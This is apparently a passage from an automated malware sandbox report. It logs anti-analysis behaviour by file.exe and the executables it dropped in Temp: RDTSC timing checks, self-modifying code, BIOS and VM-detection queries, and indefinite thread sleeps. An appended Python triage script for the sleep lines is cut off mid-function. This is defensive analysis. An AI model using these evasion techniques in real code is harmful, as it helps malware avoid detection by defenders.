Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72FB97 second address: 72FBB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60A4BE8BE1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72FBB2 second address: 72FBB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72FBB8 second address: 72FBBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72FBBC second address: 72FBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F60A4E98EF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 7237FB second address: 723801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 723801 second address: 723807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 723807 second address: 72380C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 730706 second address: 73070C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 733E05 second address: 733E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 733E0B second address: 733E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 735348 second address: 73534C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73534C second address: 735365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60A4E98EFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 6FD997 second address: 6FD99F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 6FD99F second address: 6FD9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 7387A3 second address: 7387AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 7387AC second address: 7387B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73F0AA second address: 73F0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F60A4BE8BD8h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F60A4BE8BDCh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73F0C7 second address: 73F0CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E5AE second address: 73E5B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E5B4 second address: 73E5BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F60A4E98EF6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E731 second address: 73E735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E735 second address: 73E739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E843 second address: 73E849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E849 second address: 73E851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E851 second address: 73E85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E85A second address: 73E866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F60A4E98EF6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E866 second address: 73E8C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE8h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F60A4BE8BE6h 0x00000015 jc 00007F60A4BE8BD6h 0x0000001b jmp 00007F60A4BE8BDFh 0x00000020 jmp 00007F60A4BE8BE3h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EB64 second address: 73EB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F60A4E98F02h 0x0000000b jnl 00007F60A4E98EF6h 0x00000011 jnc 00007F60A4E98EF6h 0x00000017 pushad 0x00000018 jbe 00007F60A4E98EF6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EB84 second address: 73EB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EB91 second address: 73EBDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F00h 0x00000007 jbe 00007F60A4E98EF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F60A4E98F0Ah 0x00000018 jne 00007F60A4E98F05h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73ED7F second address: 73ED98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jbe 00007F60A4BE8BD8h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F60A4BE8BD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73ED98 second address: 73ED9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73ED9C second address: 73EDA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EDA0 second address: 73EDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EF19 second address: 73EF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EF1F second address: 73EF2D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60A4E98EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EF2D second address: 73EF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EF31 second address: 73EF35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 741D04 second address: 741D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F60A4BE8BD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 741D28 second address: 741D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 7423E0 second address: 7423E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 7429A6 second address: 7429AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 743133 second address: 743137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 74326C second address: 74329E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F60A4E98EFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F60A4E98F08h 0x00000011 jng 00007F60A4E98EFCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 743377 second address: 74337C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 74337C second address: 743382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7943B1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Special instruction interceptor: First address: 59DB54 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Special instruction interceptor: First address: 73F96B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Special instruction interceptor: First address: 7D2F05 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Special instruction interceptor: First address: 58EA1D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Special instruction interceptor: First address: 743642 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Special instruction interceptor: First address: 58E933 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Special instruction interceptor: First address: 7DADF4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CDEA1D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E93642 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CDE933 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: F2ADF4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Special instruction interceptor: First address: 12543B1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Special instruction interceptor: First address: D8DBD1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Special instruction interceptor: First address: D8DB17 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Special instruction interceptor: First address: F37944 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Special instruction interceptor: First address: D8DAF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Special instruction interceptor: First address: FB73C3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Special instruction interceptor: First address: 63DB54 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Special instruction interceptor: First address: 7DF96B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Special instruction interceptor: First address: 872F05 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Special instruction interceptor: First address: 53EA1D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Special instruction interceptor: First address: 6F3642 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Special instruction interceptor: First address: 53E933 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Special instruction interceptor: First address: 78ADF4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Memory allocated: 4B70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Memory allocated: 4EE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Memory allocated: 4D10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Memory allocated: 4940000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Memory allocated: 4B60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Memory allocated: 6B60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0070F17E rdtsc 3_2_0070F17E
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1254 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1229 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1238 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 599 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5100 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe TID: 5588 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1916 Thread sleep count: 1254 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1916 Thread sleep time: -2509254s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1936 Thread sleep count: 1229 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1936 Thread sleep time: -2459229s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3416 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4088 Thread sleep count: 335 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4088 Thread sleep time: -10050000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4328 Thread sleep count: 1238 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4328 Thread sleep time: -2477238s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2052 Thread sleep count: 765 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2052 Thread sleep time: -1530765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5608 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2752 Thread sleep count: 599 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2752 Thread sleep time: -1198599s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe TID: 6784 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe TID: 6064 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe TID: 5244 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe TID: 2192 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe TID: 2584 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe TID: 2572 Thread sleep time: -126000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe TID: 3992 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Thread delayed: delay time: 922337203685477
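The "Thread sleep" lines above are the raw material for a sleep-evasion triage. The script below is an added example written for this report, not Joe Sandbox code. It parses those lines (copied into the script), totals the finite sleep budget per process, and separates out the value 922337203685477, which is INT64_MAX 100-nanosecond units expressed in milliseconds, i.e. the largest negative relative interval NtDelayExecution accepts, so a thread parked indefinitely rather than a timed sleep. The one assumption is that the report's "s"-suffixed figures are milliseconds; the count/time pairs bear this out (1254 sleeps totalling 2509254 give 2001 per call, 335 sleeps totalling 10050000 give exactly 30000).

```python
"""Sleep-evasion triage over this report's 'Thread sleep' lines.

Added example for this report (not Joe Sandbox code).  Assumption: the values
the report suffixes with "s" are milliseconds; the count/time pairs below only
divide evenly, and the INT64_MAX sentinel only lines up, under that reading.
"""
import re
from collections import defaultdict

# NtDelayExecution takes a relative interval in 100 ns units.  The most negative
# representable interval, -0x7FFFFFFFFFFFFFFF, is 922337203685477 ms, the exact
# figure the report prints for YQEN9A9QU4P1VROBPV5YS.exe and U2242U1STHGPPKHG.exe:
# an effectively infinite wait rather than a timed sleep.
INFINITE_MS = (2 ** 63 - 1) // 10_000

# The sandbox's own per-call threshold, visible in the ">= -30000s" comparisons.
THRESHOLD_MS = 30_000

LINE_RE = re.compile(
    r"^Source: (?P<exe>\S+) TID: (?P<tid>\d+) Thread sleep "
    r"(?P<kind>count|time): -?(?P<value>\d+)"
)

# Lines copied from the report above (a representative subset).
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe TID: 5100 Thread sleep time: -210000s >= -30000s Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe TID: 5588 Thread sleep time: -922337203685477s >= -30000s Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1916 Thread sleep count: 1254 > 30 Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1916 Thread sleep time: -2509254s >= -30000s Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4088 Thread sleep count: 335 > 30 Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4088 Thread sleep time: -10050000s >= -30000s Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe TID: 6784 Thread sleep time: -90000s >= -30000s Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe TID: 6064 Thread sleep time: -34017s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe TID: 3992 Thread sleep time: -922337203685477s >= -30000s",
]


def parse_sleep_lines(lines):
    """Return {exe_basename: {tid: {"count": n or None, "time_ms": t or None}}}."""
    threads = defaultdict(dict)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        exe = m["exe"].rsplit("\\", 1)[-1]
        slot = threads[exe].setdefault(int(m["tid"]), {"count": None, "time_ms": None})
        if m["kind"] == "count":
            slot["count"] = int(m["value"])
        else:
            slot["time_ms"] = int(m["value"])
    return dict(threads)


def assess(threads):
    """Per process: finite sleep budget, threads parked forever, and sleep loops
    (count > 30) with their mean per-call interval, which is the polling cadence
    a sandbox's sleep-skipping has to defeat."""
    report = {}
    for exe, tids in threads.items():
        finite = [t["time_ms"] for t in tids.values()
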